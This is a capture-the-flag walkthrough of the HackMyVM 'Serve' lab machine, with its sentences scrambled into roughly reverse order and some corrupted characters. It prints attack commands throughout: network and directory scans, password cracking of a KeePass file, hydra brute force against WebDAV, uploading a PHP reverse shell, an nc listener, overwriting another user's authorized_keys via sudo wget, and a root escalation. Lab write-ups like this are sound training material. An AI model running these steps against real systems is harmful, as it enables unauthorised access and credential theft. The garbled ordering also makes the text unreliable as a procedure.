This means that it uses “less” utility if the content overflows. It looked like it uses bropages which I found out to be similar to the man pages. cat `which bro` The content of the binary The binary was a ruby script and I opened it to see the content. The binary bro is on sudo permissions file `which bro` Now, to get root privileges, I checked the sudo permissions once again. ssh The shell of teo Root privilege escalation Then, I could do SSH as the user from my local machine. sudo -u teo wget -O /home/teo/.ssh/authorized_keys On the target machine, I copied the file as follows. On my local machine, I did the following. Thus, I served my SSH public key and copied it to authorized_keys on the. Upon checking the sudo permissions of www-data, we find that it can execute “wget” as the user “teo”. Upgrade to an intelligent reverse shell Switch shell to teoįrom this onward, the steps are quite easy. nc -nlvp 9001įinally, I hit the shell to get the reverse connection. But first, I uploaded the shell.php using curl. Also, I changed the IP address to that of mine and the port to 9001 that I would be listening to. I have copied the pentestmonkey’s shell from and put it in the current directory as shell.php. Since this is WebDAV, we can upload a PHP shell and get the reverse shell. hydra -l admin -P dict.txt http-get://10.0.0.104/webdav/ Hydra cracks the password for the user admin Spawn a reverse shell Now that I had the wordlist, I simply performed bruteforce using hydra. Then, I copied them to a file using bash. I wrote a simple python script that would print all the possibilities of the numbers from 000 to 999 as follows. keepass2 db.kdbx -pw: The password of the file using keepass2 binary The UI of the website Īs the note said, there are XXX to replace with numbers. John dbhash -show The password of the db.kdbx file John dbhash -wordlist=/home/kali/rockyou.txt Thus, we must first crack the password that is required to open the file. But before this, we should know that these services have a master password to store the password. However, we can open this on the website “ “. Now, to open the file, we can install a “keepass2” binary in Kali Linux. Luckily, I found the “db.kdbx” file that might have the credentials. gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u -x kdbx -o dir-common-secrets-kdbx.log /db.kdbx is on the /secrets/ path Thus, I enumerated the files with that extension in the path /secrets. The only password manager that I knew stored credentials in the database was keepass whose extension is kdbx. Furthermore, we have to find the correct employee number to replace with “X”s of the found credentials. Similarly, the database with the credentials to access the resource is in the secret directory. In the notes.txt file, we find a username of the machine. The content of the notes.txt is as follows.
However, there is protection on the path and hence we require credentials for that. So, if the path does what it means by name, then we can upload files to the server. gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u -x php,txt,html -o dir-common.log The gobuster scan resultsįrom the results, we see that there is a note that the author wants us to look at. Thus, I performed a gobuster directory enumeration. The home page contains the default Apache page. nmap -v -T4 -p-sC -sV -oN nmap.log 10.0.0.104 The Nmap scan results Next, I checked the open ports on the target that we can interact with.
fping -aqg 10.0.0.0/24 The IP address of the target is 10.0.0.104 Scan open ports However, if you are running it in headless mode, you can do a ping scan as follows. The author of the machine has put the IP address on the login screen of the machine. Link to the machine: Identify the IP address It’s a bit tricky to get the foothold but the remaining steps are pretty easy. Serve is an easy machine from the HackMyVM platform by d4t4s3c.
0 kommentar(er)
